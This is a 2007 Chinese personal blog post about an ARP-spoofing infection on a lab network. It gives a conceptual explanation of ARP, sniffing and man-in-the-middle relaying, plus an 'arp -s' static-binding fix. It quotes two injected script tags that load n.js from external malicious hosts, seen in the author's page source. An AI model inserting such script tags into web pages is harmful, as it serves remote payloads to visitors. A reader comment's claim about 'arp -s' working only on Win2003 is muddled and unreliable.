新鲜、有趣,互联生活。令狐葱。

2007/07/29

机子中了ARP病毒

今天打开网页的时候发现一片乱码,查看源文件看到在开头有如下一句:
[script src=http://9-6.in/n.js>[/script>
或者[script src=http://ck1.in/n.js>[/script>
这就是传说中的ARP欺骗了,看来是教研室某位同学的机子中毒了。可是为什么我遭殃呢?看一下ARP的原理:
 
在局域网中,通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞。 

  ARP协议是"Address Resolution Protocol"(地址解析协议)的缩写。在局域网中,网络中实际传输的是"帧",帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协议获得的。所谓"地址解析"就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。 

  每台安装有TCP/IP协议的电脑里都有一个ARP缓存表,表里的IP地址与MAC地址是一一对应的,如下表所示。   

  主机 IP地址 MAC地址 

  A 192.168.16.1 aa-aa-aa-aa-aa-aa 

  B 192.168.16.2  bb-bb-bb-bb-bb-bb 

  C 192.168.16.3 cc-cc-cc-cc-cc-cc 

  D 192.168.16.4 dd-dd-dd-dd-dd-dd   

  我们以主机A(192.168.16.1)向主机B(192.168.16.2) 发送数据为例。当发送数据时,主机A会在自己的ARP缓存表中寻找是否有目标IP地址。如果找到了,也就知道了目标MAC地址,直接把目标MAC地址写入帧里面发送就可以了;如果在ARP缓存表中没有找到相对应的IP地址,主机A就会在网络上发送一个广播,目标MAC地址是"FF.FF.FF.FF.FF.FF",这表示向同一网段内的所有主机发出这样的询问:"192.168.16.2的MAC地址是什么?"网络上其他主机并不响应ARP询问,只有主机B接收到这个帧时,才向主机A做出这样的回应:"192.168.16.2的MAC地址是bb-bb-bb-bb-bb-bb"。这样,主机A就知道了主机B的MAC地址,它就可以向主机B发送信息了。同时它还更新了自己的ARP缓存表,下次再向主机B发送信息时,直接从ARP缓存表里查找就可以了。ARP缓存表采用了老化机制,在一段时间内如果表中的某一行没有使用,就会被删除,这样可以大大减少ARP缓存表的长度,加快查询速度。 

  从上面可以看出,ARP协议的基础就是信任局域网内所有的人,那么就很容易实现在以太网上的ARP欺骗。对目标A进行欺骗,A去Ping主机C却发送到了DD-DD-DD-DD-DD-DD这个地址上。如果进行欺骗的时候,把C的MAC地址骗为DD-DD-DD-DD-DD-DD,于是A发送到C上的数据包都变成发送给D的了。这不正好是D能够接收到A发送的数据包了么,嗅探成功。 

  A对这个变化一点都没有意识到,但是接下来的事情就让A产生了怀疑。因为A和C连接不上了。D对接收到A发送给C的数据包可没有转交给C。 

  做"man in the middle",进行ARP重定向。打开D的IP转发功能,A发送过来的数据包,转发给C,好比一个路由器一样。不过,假如D发送ICMP重定向的话就中断了整个计划。 

  D直接进行整个包的修改转发,捕获到A发送给C的数据包,全部进行修改后再转发给C,而C接收到的数据包完全认为是从A发送来的。不过,C发送的数据包又直接传递给A,倘若再次进行对C的ARP欺骗。现在D就完全成为A与C的中间桥梁了,对于A和C之间的通讯就可以了如指掌了。 
以上信息摘自这里。在这里下载了AntiARP,可惜只能用15天。网上诱人的解决方案如下:
 
找到被攻击的那一台电脑或服务器,过去关闭掉,或者整理下.最好的方法是把那台电脑的MAC与IP绑定下.
方法如下:
打开"开始"菜单-输入"CMD"-弹出一个框来之后,输入命令"ipconfig /all"查到IP与网卡MAC后,进行绑定.
方法: arp -s 192.168.1.17 **.**.**.**
注:(**.**.**.**就是网卡的MAC)
最后回车,搞定...重启电脑.问题解决.
 
可惜我不知道是谁的机器中毒。
现在还没有解决彻底,郁闷哪

1 条评论:

匿名 说...

我也遇到过类似麻烦.
据说只有win2003才支持静态域名,其他的一律都是动态.所以arp-s的命令实际上是无效的.

不过有一款软件可以解决这个问题,叫antiarp.是免费的.